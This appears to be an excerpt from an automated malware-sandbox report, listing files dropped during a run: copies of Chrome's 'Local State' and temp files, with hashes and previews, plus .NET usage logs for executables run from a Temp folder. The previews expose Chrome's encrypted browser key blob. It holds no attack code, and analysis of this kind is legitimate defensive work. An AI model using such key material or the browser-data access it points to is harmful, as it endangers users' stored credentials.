                                                                                                                                                SHA1:062C6F716D0EE3126EB4C687FCA4F403DF7657B9
                                                                                                                                                SHA-256:53BC3171C0A8431E431E2DF17F7001AFD829930A31766D8898A81846A2992FA3
                                                                                                                                                SHA-512:84DBBDA70C2148B1FEDB2019519D5FF3BA18F4DB3CB7F218F0B9A140B86073C17BB303658132AEB6331682A48B887005C9C78B47755D5707A243465E8C8CC7E5
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"displayurl":true,"group_name_matcher":"*Shockwave Flash*","help_url":"https://support.google.com/chrome/?p=plugin_flash","lang":"en-US","mime_type
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Local StateMP (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185223
                                                                                                                                                Entropy (8bit):6.076780431502545
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:hgLLD8n55EtvVAkRNGWr9x39UfkT7RdOADfFcbXafIB0u1GOJmA3iuRw:mLLD8Qtdf0S39U6TltaqfIlUOoSiuRw
                                                                                                                                                MD5:C6253FD173F227E4E7F1D3EE08B8F6E0
                                                                                                                                                SHA1:E47BBBFAEE3A8AB40D874B80A6567A1F29919548
                                                                                                                                                SHA-256:75D32CFD112422BB63CB13795D6E93350D085BB509A1DD2E380B202F2A9C32E7
                                                                                                                                                SHA-512:DC5CD4C2B983686ECF7DCD5A0AB3624AA95F59868B2D2CA23DC983D50576556090AEB3733F6BCA0D50C0962B64A7659321E4BA6055ADE9EE910BDEF0E8484B72
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Local Statet (copy)
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):87023
                                                                                                                                                Entropy (8bit):6.102321908149239
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:SUuGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SUuFcbXafIB0u1GOJmA3iuR+
                                                                                                                                                MD5:04EA3ECF47F46C9AB073A1A8CAE1617E
                                                                                                                                                SHA1:062C6F716D0EE3126EB4C687FCA4F403DF7657B9
                                                                                                                                                SHA-256:53BC3171C0A8431E431E2DF17F7001AFD829930A31766D8898A81846A2992FA3
                                                                                                                                                SHA-512:84DBBDA70C2148B1FEDB2019519D5FF3BA18F4DB3CB7F218F0B9A140B86073C17BB303658132AEB6331682A48B887005C9C78B47755D5707A243465E8C8CC7E5
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"displayurl":true,"group_name_matcher":"*Shockwave Flash*","help_url":"https://support.google.com/chrome/?p=plugin_flash","lang":"en-US","mime_type
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\a5c47e94-90e2-4413-9940-476700670340.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185224
                                                                                                                                                Entropy (8bit):6.076777172710909
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:h9cLD8n55EtvVAkRNGWr9x39UfkT7RdOAD+FcbXafIB0u1GOJmA3iuRw:vcLD8Qtdf0S39U6TlUaqfIlUOoSiuRw
                                                                                                                                                MD5:C005E1F8BBDB08BD8E31B8EFD5A481E3
                                                                                                                                                SHA1:CEF1835073662B631533BBBF9FD323D877FF6F4C
                                                                                                                                                SHA-256:4D12801559358F65B0327E9C6A83479734B92E8FC3002A6C2EA17771D5A577ED
                                                                                                                                                SHA-512:C4DB8A3CF32103BCD2EB3AB86B5F9FE24A82CD495751DE273A987894CFC401139DD6D506DD21BF09750A69B5E285746EE20BE48AD9B597C5FA2EF1ABFCD72C74
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\ba54649f-ae69-496b-a2e4-8ef3e2285261.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):92724
                                                                                                                                                Entropy (8bit):3.749334477100088
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:7K34dqZpX8O7vYlENtrevx73CV7+Hv6GOxrcfVhxCrD/SrApm4zcb1FlSO//VNMp:W34o+59CX+Oge7tD3Q3rG/KxPNBm
                                                                                                                                                MD5:B737DC295F256C510B59268D288E2D10
                                                                                                                                                SHA1:8B19D8F23BE9C56F483DC60E34B43420A076358E
                                                                                                                                                SHA-256:6BE0B7FE791BEEC2CDAEDFF948422F2047D5B982D70ABA87D52BB08E4649203C
                                                                                                                                                SHA-512:34256F525C39C13A1002FD6B99DC2E20B278059041D061D4741672F7ED1E6F803616EAD3FC36F17640B3C115AEC0920D992E7F679B3EC31E0552EE7D049AADA6
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 0j..............*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L..P!...[)...%.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .o.f.f.i.c.e.\.o.f.f.i.c.e.1.6.\.......g.r.o.o.v.e.e.x...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .2.0.1.6...*...M.i.c.r.o.s.o.f.t. .O.n.e.D.r.i.v.e. .f.o.r. .B.u.s.i.n.e.s.s. .E.x.t.e.n.s.i.o.n.s.....1.6...0...4.7.1.1...1.0.0.0.....*...C.:.\.P.R.O.G.R.A.~.1.\.M.I.C.R.O.S.~.1.\.O.f.f.i.c.e.1.6.\.G.R.O.O.V.E.E.X...D.L.L.....M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n....I8.D...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.C.o.m.m.o.n. .F.i.l.e.s.\.M.i.c.r.o.s.o.f.t. .S.h.a.r.e.d.\.O.F.F.I.C.E.1.6.\.m.s.o.s.h.e.x.t...d.l.l..@.....U/...%.c.o.m.m.o.n.p.r.o.g.r.a.m.f.i.l.e.s.%.\.m.i.c.r.o.s.o.f.t. .s.h.a.r.e.d.\.o.f.f.i.c.e.1.6.\.......m.s.o.s.h.e.x.t...d.l.l.....M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e.)...M.i.c.r.o.s.o.f.t. .O.f.f.i.c.e. .S.h.e.l.l. .E.x.t.e.n.s.i.o.n. .H.a.n.d.l.e.r.s.......1.6...0...4.2.6.6...1.0.0.1.....D...C.:.\.P.r.o.g.r.a.m.
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\d1bea835-ec0c-4c85-9e15-c8ec6c7cb00a.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185224
                                                                                                                                                Entropy (8bit):6.0767786021951835
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:h8PLD8n55EtvVAkRNGWr9x39UfkT7RdOAD+FcbXafIB0u1GOJmA3iuRw:aPLD8Qtdf0S39U6TlUaqfIlUOoSiuRw
                                                                                                                                                MD5:FB20DB9CC2ECCF503196D173C40E506F
                                                                                                                                                SHA1:31D0BFFF97A8EAD257DAC75A19334A4269CC18EA
                                                                                                                                                SHA-256:41A240AD71C126200141586D587A7C211542BDD575B038DA91B7DC1AC5C37250
                                                                                                                                                SHA-512:CE04CF7A66FF3F14C76A76C530E66903DCAB52962979A66B2D280DD19072530282CA9F23B922DB6367D733A4A09583138B24A52F4E97320A55F027E9D543A6D4
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\d6c3685d-5a55-4a4c-bd1c-94d6754e56bf.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):185223
                                                                                                                                                Entropy (8bit):6.076780072694005
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:hrFLD8n55EtvVAkRNGWr9x39UfkT7RdOADfFcbXafIB0u1GOJmA3iuRw:pFLD8Qtdf0S39U6TltaqfIlUOoSiuRw
                                                                                                                                                MD5:9A3435BB2916D49F5662DF2DF9B0234A
                                                                                                                                                SHA1:7FB511EA0AB19F8497578647E031083111A67A9C
                                                                                                                                                SHA-256:BFD8A4F5CCA6D59405E9D0E4FFDB32E8A37EAFBAF1855AE9F4FD57DABD10CCBA
                                                                                                                                                SHA-512:9CE8ECCD4AF9E34CC3FAF9F8BE21E3B591140366FC947FDB8238AD2C0808C8AEA7FD0FB91B67A1F2F50F644793DC6A328EEC02D4E9C8C12BA6DE2F0B997B9BB2
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\df341cd3-d32d-4701-b328-329dc38280ff.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185224
                                                                                                                                                Entropy (8bit):6.076780174978916
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:t8PLD8n55EtvVAkRNGWr9x39UfkT7RdOAD+FcbXafIB0u1GOJmA3iuRw:mPLD8Qtdf0S39U6TlUaqfIlUOoSiuRw
                                                                                                                                                MD5:EA18642CBF5A149F2E28A60525572442
                                                                                                                                                SHA1:AC404D749E66CBEA45827B1C4734DE3053239B05
                                                                                                                                                SHA-256:FAEF55D41AC6DE200EDBD4EEA543F1332850256A91304CAFD4ED152C325DD06F
                                                                                                                                                SHA-512:72EF0293DED469C529E0F93334B6202AF370FAC88A945F3C3543C59A3D246318A432C6868AA451350342CCE9191C5943D6EB0F41CACFFD61F4375FC80AE8DE4D
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13276832799845608"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\e8e32cf2-a584-474e-8e3a-c19f2984814d.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:modified
                                                                                                                                                Size (bytes):87023
                                                                                                                                                Entropy (8bit):6.102321908149239
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:1536:SUuGRcZdJiXrXafIyYOetKdapZsyTwL3cDGOLN0nTwY/A3iuR+:SUuFcbXafIB0u1GOJmA3iuR+
                                                                                                                                                MD5:04EA3ECF47F46C9AB073A1A8CAE1617E
                                                                                                                                                SHA1:062C6F716D0EE3126EB4C687FCA4F403DF7657B9
                                                                                                                                                SHA-256:53BC3171C0A8431E431E2DF17F7001AFD829930A31766D8898A81846A2992FA3
                                                                                                                                                SHA-512:84DBBDA70C2148B1FEDB2019519D5FF3BA18F4DB3CB7F218F0B9A140B86073C17BB303658132AEB6331682A48B887005C9C78B47755D5707A243465E8C8CC7E5
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"displayurl":true,"group_name_matcher":"*Shockwave Flash*","help_url":"https://support.google.com/chrome/?p=plugin_flash","lang":"en-US","mime_type
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\en-US-9-0.bdic
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:data
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):451603
                                                                                                                                                Entropy (8bit):5.009711072558331
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:12288:ZHfRTyGZ6lup8Cfrvq4JBPKh+FBlESBw4p6:NfOCzvRKhGvwJ
                                                                                                                                                MD5:A78AD14E77147E7DE3647E61964C0335
                                                                                                                                                SHA1:CECC3DD41F4CEA0192B24300C71E1911BD4FCE45
                                                                                                                                                SHA-256:0D6803758FF8F87081FAFD62E90F0950DFB2DD7991E9607FE76A8F92D0E893FA
                                                                                                                                                SHA-512:DDE24D5AD50D68FC91E9E325D31E66EF8F624B6BB3A07D14FFED1104D3AB5F4EF1D7969A5CDE0DFBB19CB31C506F7DE97AF67C2F244F7E7E8E10648EA8321101
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: BDic.... ....6...."..Z..4g....6.2...{/...3...5....AF 1363.AF nm.AF pt.AF n1.AF p.AF tc.AF SM.AF M.AF S.AF MS.AF MNR.AF GDS.AF MNT.AF MH.AF MR.AF SZMR.AF MJ.AF MT.AF MY.AF MRZ.AF MN.AF MG.AF RM.AF N.AF MV.AF XM.AF DSM.AF SD.AF G.AF R.AF MNX.AF MRS.AF MD.AF MNRB.AF B.AF ZSMR.AF PM.AF SMNGJ.AF SMN.AF ZMR.AF SMGB.AF MZR.AF GM.AF SMR.AF SMDG.AF RMZ.AF ZM.AF MDG.AF MDT.AF SMNXT.AF SDY.AF LSDG.AF LGDS.AF GLDS.AF UY.AF U.AF DSGNX.AF GNDSX.AF DSG.AF Y.AF GS.AF IEMS.AF YP.AF ZGDRS.AF XGNVDS.AF UT.AF GNDS.AF GVDS.AF MYPS.AF XGNDS.AF TPRY.AF MDSG.AF ZGSDR.AF DYSG.AF PMYTNS.AF AGDS.AF DRZGS.AF PY.AF GSPMDY.AF EGVDS.AF SL.AF GNXDS.AF DSBG.AF IM.AF I.AF MDGS.AF SMY.AF DSGN.AF DSLG.AF GMDS.AF MDSBG.AF SGD.AF IY.AF P.AF DSMG.AF BLZGDRS.AF TR.AF AGSD.AF ZGBDRSL.AF PTRY.AF ASDGV.AF ASM.AF ICANGSD.AF ICAM.AF IKY.AF AMS.AF PMYTRS.AF BZGVDRS.AF SDRBZG.AF GVMDS.AF PSM.AF DGLS.AF GNVXDS.AF AGDSL.AF DGS.AF XDSGNV.AF BZGDRS.AF AM.AF AS.AF A.AF LDSG.AF AGVDS.AF SDG.AF LDSMG.AF EDSMG.AF EY.AF DRSMZG.AF PRYT.AF LZ
                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\fe69df42-7940-45ca-ad99-1bfbbf7f932b.tmp
                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):185223
                                                                                                                                                Entropy (8bit):6.076780072694005
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:3072:hrFLD8n55EtvVAkRNGWr9x39UfkT7RdOADfFcbXafIB0u1GOJmA3iuRw:pFLD8Qtdf0S39U6TltaqfIlUOoSiuRw
                                                                                                                                                MD5:9A3435BB2916D49F5662DF2DF9B0234A
                                                                                                                                                SHA1:7FB511EA0AB19F8497578647E031083111A67A9C
                                                                                                                                                SHA-256:BFD8A4F5CCA6D59405E9D0E4FFDB32E8A37EAFBAF1855AE9F4FD57DABD10CCBA
                                                                                                                                                SHA-512:9CE8ECCD4AF9E34CC3FAF9F8BE21E3B591140366FC947FDB8238AD2C0808C8AEA7FD0FB91B67A1F2F50F644793DC6A328EEC02D4E9C8C12BA6DE2F0B997B9BB2
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"85.0.4183.121"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.635541827385395e+12,"network":1.635509428e+12,"ticks":217354275.0,"uncertainty":3694755.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAABL95WKt94zTZq03WydzHLcAAAAAAIAAAAAABBmAAAAAQAAIAAAABAL2tyan+lsWtxhoUVdUYrYiwg8iJkppNr2ZbBFie9UAAAAAA6AAAAAAgAAIAAAABDv4gjLq1dOS7lkRG21YVXojnHhsRhNbP8/D1zs78mXMAAAAB045Od5v4BxiFP4bdRYJjDXn4W2fxYqQj2xfYeAnS1vCL4JXAsdfljw4oXIE4R7l0AAAABlt36FqChftM9b7EtaPw98XRX5Y944rq1WsGWcOPFyXOajfBL3GXBUhMXghJbDGb5WCu+JEdxaxLLxaYPp4zeP"},"password_manager":{"os_password_blank":true,"os_password_last_changed":"13245951016607996"},"plugins":{"metadata":{"adobe-flash-player":{"disp
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\B096.exe.log
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\B096.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):1039
                                                                                                                                                Entropy (8bit):5.365622957937216
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:24:ML9E4Ks2wKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7K84jE4Ks:MxHKXwYHKhQnoPtHoxHhAHKzvKvjHKs
                                                                                                                                                MD5:AE8CFF33270358D6EC23793128B3EF2F
                                                                                                                                                SHA1:5E6B156157EDEA4222A5E0C258AE9ADEBB8CB7CE
                                                                                                                                                SHA-256:498EAB9F855E7CE9B812EAD41339A9475127F0C8E7249033B975071D2292220C
                                                                                                                                                SHA-512:473111AD332D5E66724AFB0CE5A1E1C97890D60484A818D1DB8C2386A99C05BAE6C9D5C535DDFB6790BF5707C153502B938BE201393A3D70342A62902E0A3C98
                                                                                                                                                Malicious:false
                                                                                                                                                Reputation:unknown
                                                                                                                                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutra
                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\BBE1.exe.log
                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\BBE1.exe
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):2388
                                                                                                                                                Entropy (8bit):5.316698480382997
                                                                                                                                                Encrypted:false
